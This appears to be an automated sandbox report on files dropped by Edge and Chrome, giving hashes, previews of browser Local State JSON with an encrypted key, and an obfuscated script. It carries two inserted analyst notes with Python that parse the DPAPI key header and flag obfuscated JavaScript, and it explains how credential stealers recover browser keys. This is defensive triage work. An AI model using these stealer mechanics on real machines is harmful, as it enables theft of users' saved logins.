                                                                              SHA-256:7FC23C9028A316EC0AC25B09B5B0D61A1D21E58DFCF84C2A5F5B529129729098
                                                                              SHA-512:F0B7DF5517596B38D57C57B5777E008D6229AB5B1841BBE74602C77EEA2252BF644B8650C7642BD466213F62E15CC7AB5A95B28E26D3907260ED1B96A74B65FB
                                                                              Malicious:false
                                                                              Reputation:unknown
                                                                              Preview:117.0.2045.47
                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                              File Type:JSON data
                                                                              Category:dropped
                                                                              Size (bytes):0
                                                                              Entropy (8bit):0.0
                                                                              Encrypted:false
                                                                              SSDEEP:
                                                                              MD5:FC6E53363D457571F77BA1A2968DAC0A
                                                                              SHA1:EA84E177A801C2EDB1DFEB801AED747600062FC1
                                                                              SHA-256:6A3D33554E8B065A5E57FA793EA2BDECDA1231DB93E90EF857C85B8F31A1CE4F
                                                                              SHA-512:46CD81DA755D221F124DFAC5BD612F2F00B300CF0196A6B1F51E2B43BB5D550FC18F15F8B67D6F186D66E49C1F9E07A60DEAFA1C37F4A7FF727950B051B1EB6D
                                                                              Malicious:false
                                                                              Reputation:unknown
                                                                              Preview:{"edge":{"perf_center":{"efficiency_mode_v2_is_active":false,"perf_game_mode":true,"performance_mode":3,"performance_mode_is_on":false}},"legacy":{"profile":{"name":{"migrated":true}}},"os_crypt":{"audit_enabled":true,"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAABpzIBx9LAtTa5M7IrpTApEEAAAAB4AAABNAGkAYwByAG8AcwBvAGYAdAAgAEUAZABnAGUAAAAQZgAAAAEAACAAAADdz4fXaWhNOILuzFmkzx/2rOq5TAtpW2sVoD5HUT04pwAAAAAOgAAAAAIAACAAAABKcfFS/gzvtGLCop8NmpSA9lrAeHcvF5R9QbRcPp0EEDAAAAB89bcdRGEvDVgg3tdjDMMC9q94Mr/ouYrM9JcDITXhbIYWh99vxEuWVCvPwwyQcklAAAAAe51rQYqg6e1fgUixhlGu1rSTVeqIPQ1QV11O+McmGICDz/wS+m9QfYyi8P8sX6oOtpBjEIwFwCFj4cmZDX456Q=="},"profile":{"info_cache":{},"profile_counts_reported":"13386447348432715","profiles_order":[]},"smartscreen":{"enabled":true,"pua_protection_enabled":false},"telemetry_client":{"install_source_name":"windows","os_integration_level":5,"updater_version":"1.3.183.29","windows_update_applied":false},"uninstall_metrics":{"installation_date2":"1741973748"},"user_experien
                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                              File Type:ASCII text, with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):29
                                                                              Entropy (8bit):3.922828737239167
                                                                              Encrypted:false
                                                                              SSDEEP:
                                                                              MD5:7BAAFE811F480ACFCCCEE0D744355C79
                                                                              SHA1:24B89AE82313084BB8BBEB9AD98A550F41DF7B27
                                                                              SHA-256:D5743766AF0312C7B7728219FC24A03A4FB1C2A54A506F337953FBC2C1B847C7
                                                                              SHA-512:70FE1C197AF507CC0D65E99807D245C896A40A4271BA1121F9B621980877B43019E584C48780951FC1AD2A5D7D146FC6EA4678139A5B38F9B6F7A5F1E2E86BA3
                                                                              Malicious:false
                                                                              Reputation:unknown
                                                                              Preview:customSynchronousLookupUris_0
                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                              File Type:ASCII text, with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):47
                                                                              Entropy (8bit):4.493433469104717
                                                                              Encrypted:false
                                                                              SSDEEP:
                                                                              MD5:3F90757B200B52DCF5FDAC696EFD3D60
                                                                              SHA1:569A2E1BED9ECCDF7CD03E270AEF2BD7FF9B0E77
                                                                              SHA-256:1EE63F0A3502CFB7DF195FABBA41A7805008AB2CCCDAEB9AF990409D163D60C8
                                                                              SHA-512:39252BBAA33130DF50F36178A8EAB1D09165666D8A229FBB3495DD01CBE964F87CD2E6FCD479DFCA36BE06309EF18FEDA7F14722C57545203BBA24972D4835C8
                                                                              Malicious:false
                                                                              Reputation:unknown
                                                                              Preview:synchronousLookupUris_636976985063396749.rel.v2
                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):35302
                                                                              Entropy (8bit):7.99333285466604
                                                                              Encrypted:true
                                                                              SSDEEP:
                                                                              MD5:0E06E28C3536360DE3486B1A9E5195E8
                                                                              SHA1:EB768267F34EC16A6CCD1966DCA4C3C2870268AB
                                                                              SHA-256:F2658B1C913A96E75B45E6ADB464C8D796B34AC43BAF1635AA32E16D1752971C
                                                                              SHA-512:45F1E909599E2F63372867BC359CF72FD846619DFEB5359E52D5700E0B1BCFFE5FF07606511A3BFFDDD933A0507195439457E4E29A49EB6451F26186B7240041
                                                                              Malicious:false
                                                                              Reputation:unknown
                                                                              Preview:.......murmur3.....IN...9.......0..X..#l....C....]......pv..E..........,..?.N?....V..B-.*.F.1....g|..._.>'.-(V... .=.7P.m....#}.r.....>.LE...G.A.h5........J..=..L^-.Zl++,..h..o.y..~j.]u...W...&s.........M..........h3b..[.5.]..V^w.........a.*...6g3..%.gy../{|Z.B..X.}5.]..t.1.H&B.[.).$Y......2....L.t...{...[WE.yy.]..e.v0..\.J3..T.`1Lnh.../..-=w...W.&N7.nz.P...z......'i..R6....../....t.[..&-.....T&l..e....$.8.."....Iq....J.v..|.6.M...zE...a9uw..'.$6.L..m$......NB).JL.G.7}8(`....J.)b.E.m...c.0I.V...|$....;.k.......*8v..l.:..@.F.........K..2...%(...kA......LJd~._A.N.....$3...5....Z"...X=.....%.........6.k.....F..1..l,ia..i.i....y.M..Cl.....*...}.I..r..-+=b.6....%...#...W..K.....=.F....~.....[.......-...../;....~.09..d.....GR..H.lR...m.Huh9.:..A H./)..D.F..Y.n7.....7D.O.a;>Z.K....w...sq..qo3N...8@.zpD.Ku......+.Z=.zNFgP._@.z.ic.......3.....+..j...an%...X..7.q..A.l.7.S2..+....1.s.b..z...@v..!.y...N.C.XQ.p.\..x8(.<.....cq.(
                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                              File Type:JSON data
                                                                              Category:dropped
                                                                              Size (bytes):4213
                                                                              Entropy (8bit):5.487142149051434
                                                                              Encrypted:false
                                                                              SSDEEP:
                                                                              MD5:966B6D714D6E9CE2E93C9CC5535AC462
                                                                              SHA1:B285E9D315BD86B0E14B3DD2CCC66150268562BC
                                                                              SHA-256:7234EFC60AA07ADA97998DA54CB4768812EB31CB3ABCD01634CFD537C8B29326
                                                                              SHA-512:A8169E47E77BBC176FA7DB36296C84BF01DA14B7574F694B560D726065B6DFEBF700FC733F892B4E029E197154405BFF5BABFB215E3C3F0EF56F4C1328F9B1F8
                                                                              Malicious:false
                                                                              Reputation:unknown
                                                                              Preview:{"dual_engine":{"ie_to_edge":{"redirection_mode":0}},"edge":{"perf_center":{"efficiency_mode_v2_is_active":false,"perf_game_mode":true,"performance_mode":3,"performance_mode_is_on":false},"tab_stabs":{"closed_without_unfreeze_never_unfrozen":0,"closed_without_unfreeze_previously_unfrozen":0,"discard_without_unfreeze_never_unfrozen":0,"discard_without_unfreeze_previously_unfrozen":0},"tab_stats":{"frozen_daily":0,"unfrozen_daily":0}},"fre":{"oem_bookmarks_set":true},"hardware_acceleration_mode_previous":true,"legacy":{"profile":{"name":{"migrated":true}}},"os_crypt":{"audit_enabled":true,"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAABpzIBx9LAtTa5M7IrpTApEEAAAAB4AAABNAGkAYwByAG8AcwBvAGYAdAAgAEUAZABnAGUAAAAQZgAAAAEAACAAAADdz4fXaWhNOILuzFmkzx/2rOq5TAtpW2sVoD5HUT04pwAAAAAOgAAAAAIAACAAAABKcfFS/gzvtGLCop8NmpSA9lrAeHcvF5R9QbRcPp0EEDAAAAB89bcdRGEvDVgg3tdjDMMC9q94Mr/ouYrM9JcDITXhbIYWh99vxEuWVCvPwwyQcklAAAAAe51rQYqg6e1fgUixhlGu1rSTVeqIPQ1QV11O+McmGICDz/wS+m9QfYyi8P8sX6oOtpBjEIwFwCFj4cmZD
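Analyst note on the Edge "Local State" entries above (an added example, not part of the sandbox report and not Microsoft's or Chromium's code): the os_crypt.encrypted_key value is base64 whose plaintext starts with the literal DPAPI followed by a CryptProtectData blob. Browser-credential stealers of the kind this report flags hand that blob to CryptUnprotectData in the victim's own user context to recover the 32-byte AES-256-GCM key that wraps the logins in "Login Data". Offline, the blob header alone still tells an analyst which DPAPI master key was used, under which flags, and with which algorithms. The Python below was written for this note; it decodes the key from a constructed JSON fragment that carries the report's own encrypted_key value and walks the DPAPI_BLOB header as laid out by CryptProtectData. The ALG_NAMES table is a convenience covering only the algorithm IDs expected here.

```python
import base64
import json
import struct
import uuid

# Constructed fragment: only the os_crypt object of the report's Edge "Local State"
# preview, with the encrypted_key value copied verbatim from the report.
LOCAL_STATE_FRAGMENT = (
    '{"os_crypt":{"audit_enabled":true,"encrypted_key":"'
    "RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAABpzIBx9LAtTa5M7IrpTApEEAAAAB4AAABN"
    "AGkAYwByAG8AcwBvAGYAdAAgAEUAZABnAGUAAAAQZgAAAAEAACAAAADdz4fXaWhNOILuzFmk"
    "zx/2rOq5TAtpW2sVoD5HUT04pwAAAAAOgAAAAAIAACAAAABKcfFS/gzvtGLCop8NmpSA9lrA"
    "eHcvF5R9QbRcPp0EEDAAAAB89bcdRGEvDVgg3tdjDMMC9q94Mr/ouYrM9JcDITXhbIYWh99v"
    "xEuWVCvPwwyQcklAAAAAe51rQYqg6e1fgUixhlGu1rSTVeqIPQ1QV11O+McmGICDz/wS+m9Q"
    "fYyi8P8sX6oOtpBjEIwFwCFj4cmZDX456Q=="
    '"}}'
)

# Chromium prefixes the DPAPI output with this literal to mark a v10 key.
DPAPI_PREFIX = b"DPAPI"
# Provider GUID present in every blob produced by CryptProtectData.
DPAPI_PROVIDER_GUID = uuid.UUID("df9d8cd0-1501-11d1-8c7a-00c04fc297eb")
CRYPTPROTECT_LOCAL_MACHINE = 0x4   # blob bound to the machine, not the user
CRYPTPROTECT_AUDIT = 0x10          # decryption generates an audit event
ALG_NAMES = {0x6603: "CALG_3DES", 0x6610: "CALG_AES_256",
             0x8004: "CALG_SHA1", 0x800E: "CALG_SHA_512"}


def _u32(buf: bytes, off: int):
    return struct.unpack_from("<I", buf, off)[0], off + 4


def _guid(buf: bytes, off: int):
    # Windows GUIDs store the first three fields little-endian.
    return uuid.UUID(bytes_le=bytes(buf[off:off + 16])), off + 16


def _sized(buf: bytes, off: int):
    # Length-prefixed field: a DWORD byte count followed by the bytes themselves.
    n, off = _u32(buf, off)
    if off + n > len(buf):
        raise ValueError("length-prefixed field runs past the end of the blob")
    return buf[off:off + n], off + n


def parse_dpapi_blob(blob: bytes) -> dict:
    """Walk the DPAPI_BLOB layout written by CryptProtectData and return its header fields.

    Nothing here decrypts: the ciphertext is only measured. Decryption needs the
    master key file named by master_key_guid plus the user's logon secret."""
    off = 0
    version, off = _u32(blob, off)
    provider, off = _guid(blob, off)
    mk_version, off = _u32(blob, off)
    master_key, off = _guid(blob, off)
    flags, off = _u32(blob, off)
    description, off = _sized(blob, off)      # UTF-16LE, NUL-terminated
    alg_crypt, off = _u32(blob, off)
    alg_crypt_bits, off = _u32(blob, off)
    salt, off = _sized(blob, off)
    hmac_key, off = _sized(blob, off)          # usually empty
    alg_hash, off = _u32(blob, off)
    alg_hash_bits, off = _u32(blob, off)
    hmac2_key, off = _sized(blob, off)
    ciphertext, off = _sized(blob, off)
    signature, off = _sized(blob, off)         # HMAC over the blob
    if off != len(blob):
        raise ValueError(f"{len(blob) - off} trailing bytes after the signature")
    if provider != DPAPI_PROVIDER_GUID:
        raise ValueError(f"unexpected provider GUID {provider}")
    return {
        "version": version,
        "provider_guid": str(provider),
        "master_key_version": mk_version,
        "master_key_guid": str(master_key),
        "flags": flags,
        "machine_scope": bool(flags & CRYPTPROTECT_LOCAL_MACHINE),
        "audit": bool(flags & CRYPTPROTECT_AUDIT),
        "description": description.decode("utf-16-le").rstrip("\x00"),
        "alg_crypt": ALG_NAMES.get(alg_crypt, hex(alg_crypt)),
        "alg_crypt_bits": alg_crypt_bits,
        "alg_hash": ALG_NAMES.get(alg_hash, hex(alg_hash)),
        "alg_hash_bits": alg_hash_bits,
        "salt_len": len(salt),
        "hmac_key_len": len(hmac_key),
        "hmac2_key_len": len(hmac2_key),
        "ciphertext_len": len(ciphertext),
        "signature_len": len(signature),
    }


def parse_local_state(local_state_json: str) -> dict:
    """Extract os_crypt.encrypted_key from a Local State document and parse its DPAPI header."""
    key_b64 = json.loads(local_state_json)["os_crypt"]["encrypted_key"]
    raw = base64.b64decode(key_b64, validate=True)
    if not raw.startswith(DPAPI_PREFIX):
        raise ValueError("encrypted_key does not start with the DPAPI prefix")
    return parse_dpapi_blob(raw[len(DPAPI_PREFIX):])


if __name__ == "__main__":
    for field, value in parse_local_state(LOCAL_STATE_FRAGMENT).items():
        print(f"{field:>20}: {value}")
```

Run against the report's value, the walk returns a user-scoped blob with CRYPTPROTECT_AUDIT set (consistent with "audit_enabled":true in the same JSON), description "Microsoft Edge", AES-256 with an SHA-512 HMAC, a 48-byte ciphertext (the 32-byte browser key plus one block of PKCS#7 padding) and the GUID of the master key that protects it. That GUID is the file name under %APPDATA%\Microsoft\Protect\<SID>\ in the victim's profile; without that file and the user's credentials, exfiltrating Local State on its own does not yield the browser key, which is why stealers decrypt on the host instead. Newer Chromium builds add a separate app_bound_encrypted_key entry that this header walk does not cover.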
                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):0
                                                                              Entropy (8bit):0.0
                                                                              Encrypted:false
                                                                              SSDEEP:
                                                                              MD5:24C79C623DE528CAAE3EFA89F1B07626
                                                                              SHA1:68680935241A9846297829693C25DC4D649D3210
                                                                              SHA-256:E53942F4C123FB867C7CC5F2E3769180DFEF7A27B15C61247D25F27CC7FB11DD
                                                                              SHA-512:6B63E7FAFA8B19A60D14B981461890E6884CEC5B1F5F5D12C00DE27DBC654273B236AF83E298B36DDA19A90531CD0740E924A43A81C05C62B4F4E6C3CACCCA46
                                                                              Malicious:false
                                                                              Reputation:unknown
                                                                              Preview:function _QIDAXGJsbYMmcMJrpWDtcUByzhExpwuNRmNTGhEZJjFOdGVymAUrFzVYUAccttSgTwpnknCCVKswdjtipRoisSxXmPIhaWzRCjfAMGvMfIKRHPEFCyBRZYHYiuUUtpBSVWLPNgZyiczrwfuMHdqjBLUiRsiyJANyUXZlFNNbuSbqBQQCpHLBMrhizUFDvikWhhdzVopPLyjZOVzutVZFwQlCMrDvBWvYCzSITWOySNhhjsCQovYhjKNEwORmcKAPSTXCSbhzViGWCODZHaVbpEMZpWQyPzDpMXzjrENpplFZgArEnrmrodbrZhguPKkWgvrnmEToKEJIpQtWxAvDlCkIdJQQdFPMWCQvPJekWinbFvfcWSuNqEyLYLAXwCpEuOLDfpFRyVbldwPcogIdBNjZzkoTaoiHnrIPAIqEIsOVEguMOFQTrPKWVeZltIGonHnXMaMvJVHwgYNgkJhYBTHnqYzUFbvTSoqZDLFOZAUYMUugzrWXKcgifFxSXUxdQCxKkSmfoGlbjUowuAKHmsuuHyHKjPMIotusNntDwHsGOnBoUeCZASgIsjvhELwNzErmSnHURwBLzmaJwmgROOmYSewrcxyJDOzXVtMGJfKbaRvNZeBdEgYHmcExTRdWJjGTaIvwdlfihPDffoWvserRGJvMjAJuavPUCHGJPCTSCzJHiSabejuztYQAPJtXIMaeDKPxRdhtIwUkOvNjvMcivaMxaIdyFqlmdBDxYvNIklhresteoemEyfUfvWbmzULbOIqSgWQcIxElvPfHDUESAQSbLSAxpIIxv4d9e(_QIDAXGJsbYMmcMJrpWDtcUByzhExpwuNRmNTGhEZJjFOdGVymAUrFzVYUAccttSgTwpnknCCVKswdjtipRoisSxXmPIhaWzRCjfAMGvMfIKRHPEFCyBRZYHYiuUUtpBSVWLPNgZyiczrwfuMHdqjBLUiRsiyJANyUXZlFNNbuSbqBQQCpHL
                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):0
                                                                              Entropy (8bit):0.0
                                                                              Encrypted:false
                                                                              SSDEEP:
                                                                              MD5:24C79C623DE528CAAE3EFA89F1B07626
                                                                              SHA1:68680935241A9846297829693C25DC4D649D3210
                                                                              SHA-256:E53942F4C123FB867C7CC5F2E3769180DFEF7A27B15C61247D25F27CC7FB11DD
                                                                              SHA-512:6B63E7FAFA8B19A60D14B981461890E6884CEC5B1F5F5D12C00DE27DBC654273B236AF83E298B36DDA19A90531CD0740E924A43A81C05C62B4F4E6C3CACCCA46
                                                                              Malicious:false
                                                                              Reputation:unknown
                                                                              Preview:function _QIDAXGJsbYMmcMJrpWDtcUByzhExpwuNRmNTGhEZJjFOdGVymAUrFzVYUAccttSgTwpnknCCVKswdjtipRoisSxXmPIhaWzRCjfAMGvMfIKRHPEFCyBRZYHYiuUUtpBSVWLPNgZyiczrwfuMHdqjBLUiRsiyJANyUXZlFNNbuSbqBQQCpHLBMrhizUFDvikWhhdzVopPLyjZOVzutVZFwQlCMrDvBWvYCzSITWOySNhhjsCQovYhjKNEwORmcKAPSTXCSbhzViGWCODZHaVbpEMZpWQyPzDpMXzjrENpplFZgArEnrmrodbrZhguPKkWgvrnmEToKEJIpQtWxAvDlCkIdJQQdFPMWCQvPJekWinbFvfcWSuNqEyLYLAXwCpEuOLDfpFRyVbldwPcogIdBNjZzkoTaoiHnrIPAIqEIsOVEguMOFQTrPKWVeZltIGonHnXMaMvJVHwgYNgkJhYBTHnqYzUFbvTSoqZDLFOZAUYMUugzrWXKcgifFxSXUxdQCxKkSmfoGlbjUowuAKHmsuuHyHKjPMIotusNntDwHsGOnBoUeCZASgIsjvhELwNzErmSnHURwBLzmaJwmgROOmYSewrcxyJDOzXVtMGJfKbaRvNZeBdEgYHmcExTRdWJjGTaIvwdlfihPDffoWvserRGJvMjAJuavPUCHGJPCTSCzJHiSabejuztYQAPJtXIMaeDKPxRdhtIwUkOvNjvMcivaMxaIdyFqlmdBDxYvNIklhresteoemEyfUfvWbmzULbOIqSgWQcIxElvPfHDUESAQSbLSAxpIIxv4d9e(_QIDAXGJsbYMmcMJrpWDtcUByzhExpwuNRmNTGhEZJjFOdGVymAUrFzVYUAccttSgTwpnknCCVKswdjtipRoisSxXmPIhaWzRCjfAMGvMfIKRHPEFCyBRZYHYiuUUtpBSVWLPNgZyiczrwfuMHdqjBLUiRsiyJANyUXZlFNNbuSbqBQQCpHL
                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):130015
                                                                              Entropy (8bit):5.815058363490485
                                                                              Encrypted:false
                                                                              SSDEEP:
                                                                              MD5:24C79C623DE528CAAE3EFA89F1B07626
                                                                              SHA1:68680935241A9846297829693C25DC4D649D3210
                                                                              SHA-256:E53942F4C123FB867C7CC5F2E3769180DFEF7A27B15C61247D25F27CC7FB11DD
                                                                              SHA-512:6B63E7FAFA8B19A60D14B981461890E6884CEC5B1F5F5D12C00DE27DBC654273B236AF83E298B36DDA19A90531CD0740E924A43A81C05C62B4F4E6C3CACCCA46
                                                                              Malicious:false
                                                                              Reputation:unknown
                                                                              Preview:function _QIDAXGJsbYMmcMJrpWDtcUByzhExpwuNRmNTGhEZJjFOdGVymAUrFzVYUAccttSgTwpnknCCVKswdjtipRoisSxXmPIhaWzRCjfAMGvMfIKRHPEFCyBRZYHYiuUUtpBSVWLPNgZyiczrwfuMHdqjBLUiRsiyJANyUXZlFNNbuSbqBQQCpHLBMrhizUFDvikWhhdzVopPLyjZOVzutVZFwQlCMrDvBWvYCzSITWOySNhhjsCQovYhjKNEwORmcKAPSTXCSbhzViGWCODZHaVbpEMZpWQyPzDpMXzjrENpplFZgArEnrmrodbrZhguPKkWgvrnmEToKEJIpQtWxAvDlCkIdJQQdFPMWCQvPJekWinbFvfcWSuNqEyLYLAXwCpEuOLDfpFRyVbldwPcogIdBNjZzkoTaoiHnrIPAIqEIsOVEguMOFQTrPKWVeZltIGonHnXMaMvJVHwgYNgkJhYBTHnqYzUFbvTSoqZDLFOZAUYMUugzrWXKcgifFxSXUxdQCxKkSmfoGlbjUowuAKHmsuuHyHKjPMIotusNntDwHsGOnBoUeCZASgIsjvhELwNzErmSnHURwBLzmaJwmgROOmYSewrcxyJDOzXVtMGJfKbaRvNZeBdEgYHmcExTRdWJjGTaIvwdlfihPDffoWvserRGJvMjAJuavPUCHGJPCTSCzJHiSabejuztYQAPJtXIMaeDKPxRdhtIwUkOvNjvMcivaMxaIdyFqlmdBDxYvNIklhresteoemEyfUfvWbmzULbOIqSgWQcIxElvPfHDUESAQSbLSAxpIIxv4d9e(_QIDAXGJsbYMmcMJrpWDtcUByzhExpwuNRmNTGhEZJjFOdGVymAUrFzVYUAccttSgTwpnknCCVKswdjtipRoisSxXmPIhaWzRCjfAMGvMfIKRHPEFCyBRZYHYiuUUtpBSVWLPNgZyiczrwfuMHdqjBLUiRsiyJANyUXZlFNNbuSbqBQQCpHL
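Analyst note on the script dropped by chrome.exe above (an added example, not code from the report, from the page under analysis, or from the javascript-obfuscator project): the preview shows a function whose name runs to several hundred characters and a first parameter that shares the same long prefix, and the report also records the browser fetching javascript-obfuscator's index.browser.js from cdn.jsdelivr.net. Identifier length is a cheap first triage signal for such output. The Python below was written for this note; its sample inputs are constructed from the report's own previews: the opening of the dropped script, and the opening of alertify.min.js as a benign control. The 64-character and 50 % thresholds are my assumptions, not a published rule.

```python
import re
from statistics import mean

# ASCII JavaScript identifier; good enough for triage, not a full lexer.
JS_IDENT = re.compile(r"[A-Za-z_$][A-Za-z0-9_$]*")
JS_KEYWORDS = {
    "break", "case", "catch", "const", "continue", "default", "do", "else", "false",
    "for", "function", "if", "in", "instanceof", "let", "new", "null", "of", "return",
    "switch", "this", "throw", "true", "try", "typeof", "var", "while",
}

# Constructed sample: the report's preview of the dropped script. The function
# name and its first parameter share this roughly 180-character prefix.
NAME_PREFIX = (
    "_QIDAXGJsbYMmcMJrpWDtcUByzhExpwuNRmNTGhEZJjFOdGVymAUrFzVYUAccttSgTwpnknCCVKswdjtipRoisSxXmPIhaWzRCjf"
    "AMGvMfIKRHPEFCyBRZYHYiuUUtpBSVWLPNgZyiczrwfuMHdqjBLUiRsiyJANyUXZlFNNbuSbqBQQCpHL"
)
NAME_TAIL = (
    "BMrhizUFDvikWhhdzVopPLyjZOVzutVZFwQlCMrDvBWvYCzSITWOySNhhjsCQovYhjKNEwORmcKAPSTXCSbhzViGWCODZHaVbpEM"
    "ZpWQyPzDpMXzjrENpplFZgArEnrmrodbrZhguPKkWgvrnmEToKEJIpQtWxAvDlCkIdJQQdFPMWCQvPJekWinbFvfcWSuNqEyLYLA"
    "XwCpEuOLDfpFRyVbldwPcogIdBNjZzkoTaoiHnrIPAIqEIsOVEguMOFQTrPKWVeZltIGonHnXMaMvJVHwgYNgkJhYBTHnqYzUFbv"
    "TSoqZDLFOZAUYMUugzrWXKcgifFxSXUxdQCxKkSmfoGlbjUowuAKHmsuuHyHKjPMIotusNntDwHsGOnBoUeCZASgIsjvhELwNzEr"
    "mSnHURwBLzmaJwmgROOmYSewrcxyJDOzXVtMGJfKbaRvNZeBdEgYHmcExTRdWJjGTaIvwdlfihPDffoWvserRGJvMjAJuavPUCHG"
    "JPCTSCzJHiSabejuztYQAPJtXIMaeDKPxRdhtIwUkOvNjvMcivaMxaIdyFqlmdBDxYvNIklhresteoemEyfUfvWbmzULbOIqSgWQ"
    "cIxElvPfHDUESAQSbLSAxpIIxv4d9e"
)
OBFUSCATED_EXCERPT = "function " + NAME_PREFIX + NAME_TAIL + "(" + NAME_PREFIX

# Constructed sample: the opening of the alertify.min.js preview, as a benign control.
BENIGN_EXCERPT = (
    '!function(a){"use strict";function b(a,b){a.className+=" "+b}'
    'function c(a,b){for(var c=a.className.split(" "),d=b.split(" "),e=0;e<d.length;e+=1)'
    '{var f=c.indexOf(d[e]);f>-1&&c.splice(f,1)}a.className=c.join(" ")}'
)


def identifier_stats(src: str, long_threshold: int = 64) -> dict:
    """Length statistics over the non-keyword identifiers in a JavaScript source."""
    idents = [m.group(0) for m in JS_IDENT.finditer(src) if m.group(0) not in JS_KEYWORDS]
    if not idents:
        return {"count": 0, "max_len": 0, "mean_len": 0.0, "long_count": 0, "long_share": 0.0}
    long_idents = [i for i in idents if len(i) >= long_threshold]
    return {
        "count": len(idents),
        "max_len": max(len(i) for i in idents),
        "mean_len": round(mean(len(i) for i in idents), 1),
        "long_count": len(long_idents),
        # Fraction of all source characters taken up by over-long identifiers.
        "long_share": round(sum(len(i) for i in long_idents) / len(src), 3),
    }


def looks_obfuscated(src: str, long_threshold: int = 64, share_threshold: float = 0.5) -> bool:
    """Flag a source in which over-long identifiers dominate the text (thresholds are assumptions)."""
    stats = identifier_stats(src, long_threshold)
    return stats["max_len"] >= long_threshold and stats["long_share"] >= share_threshold


if __name__ == "__main__":
    for label, sample in (("dropped script", OBFUSCATED_EXCERPT), ("alertify.min.js", BENIGN_EXCERPT)):
        verdict = "obfuscated" if looks_obfuscated(sample) else "benign"
        print(f"{label}: {identifier_stats(sample)} -> {verdict}")
```

The share-of-source measure is what keeps minified library code, which also has short names and no whitespace, on the benign side: alertify's identifiers are short, so its long_share is zero, while nearly every character of the dropped script's opening belongs to an identifier longer than any human would type. Treat a hit as a reason to pull the full file and the page that generated it, not as a verdict on its own.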
                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              File Type:HTML document, ASCII text
                                                                              Category:downloaded
                                                                              Size (bytes):356
                                                                              Entropy (8bit):5.3412711221156
                                                                              Encrypted:false
                                                                              SSDEEP:
                                                                              MD5:F69B5890EAB9514CA4171F0E1D210FA9
                                                                              SHA1:A37996A3A0B5C86AB6976F8C628E43AFBA02B937
                                                                              SHA-256:4AF4DB14D712108FC668D358A80B03D5684A111A2FB6F4AB2071FF0C64FE8923
                                                                              SHA-512:9241AB96FD4862351BF18A79BF0B7591ED42BF8CEB2DFBA215DFB764555C6859C59F9F331A025557882E6C3A3F9A6D15BADF26090EAA3951D170F67D20D8C86A
                                                                              Malicious:false
                                                                              Reputation:unknown
                                                                              URL:https://www.securefilepro.com/assets/css/styles.css?v=1.0
                                                                              Preview:<html>.<head><title>404 Not Found</title></head>.<body>.<h1>404 Not Found</h1>.<ul>.<li>Code: NoSuchKey</li>.<li>Message: The specified key does not exist.</li>.<li>Key: assets/css/styles.css</li>.<li>RequestId: V6P4J6QBD4Y9306W</li>.<li>HostId: H2IWfleTcIS9l5f5CDzFeQ9eM/lu7ODZz3PYvC/PZpIyTqZcWNXFwObe3GVpiIOHnnyYsuPh1Qw=</li>.</ul>.<hr/>.</body>.</html>.
                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              File Type:ASCII text, with very long lines (1572)
                                                                              Category:downloaded
                                                                              Size (bytes):6193
                                                                              Entropy (8bit):5.401714743814202
                                                                              Encrypted:false
                                                                              SSDEEP:
                                                                              MD5:F2D1D2937C3546E15C471236646AC74E
                                                                              SHA1:DD8D90F6D4AC8D72C718C10424788612689D89DB
                                                                              SHA-256:719D2FC548145FA8D8361205F6FCB49EEFC54C71FBB18E6320A60A263F40637A
                                                                              SHA-512:7B400281407249F805AB4695E0B7D3CDF4F7F5F776F9F7E60872D5208B7324DADDDAD79D76AC9991C74563520FB6BFF3A6343C8C10591C9EB5682733592668A4
                                                                              Malicious:false
                                                                              Reputation:unknown
                                                                              URL:https://fonts.googleapis.com/css?family=Open+Sans&display=swap
                                                                              Preview:/* cyrillic-ext */.@font-face {. font-family: 'Open Sans';. font-style: normal;. font-weight: 400;. font-stretch: 100%;. font-display: swap;. src: url(https://fonts.gstatic.com/s/opensans/v40/memSYaGs126MiZpBA-UvWbX2vVnXBbObj2OVZyOOSr4dVJWUgsjZ0B4taVIGxA.woff2) format('woff2');. unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;.}./* cyrillic */.@font-face {. font-family: 'Open Sans';. font-style: normal;. font-weight: 400;. font-stretch: 100%;. font-display: swap;. src: url(https://fonts.gstatic.com/s/opensans/v40/memSYaGs126MiZpBA-UvWbX2vVnXBbObj2OVZyOOSr4dVJWUgsjZ0B4kaVIGxA.woff2) format('woff2');. unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;.}./* greek-ext */.@font-face {. font-family: 'Open Sans';. font-style: normal;. font-weight: 400;. font-stretch: 100%;. font-display: swap;. src: url(https://fonts.gstatic.com/s/opensans/v40/memSYaGs126MiZpBA-UvWbX2vVnXBbObj2OVZyOOSr4dVJWUgsjZ0B4saVIGxA.woff2) for
                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              File Type:PNG image data, 354 x 56, 8-bit/color RGBA, non-interlaced
                                                                              Category:downloaded
                                                                              Size (bytes):11122
                                                                              Entropy (8bit):7.978590954352468
                                                                              Encrypted:false
                                                                              SSDEEP:
                                                                              MD5:C0A0C1D28F7B5DF1A78D8F2ECEACC3FE
                                                                              SHA1:B4A3E4D73ADE33D090BBB7BC733647650F4C852A
                                                                              SHA-256:2C1DACA7627C1DF4A1D013A61079162C281EABF025771BEB7B0C522064F9AFC7
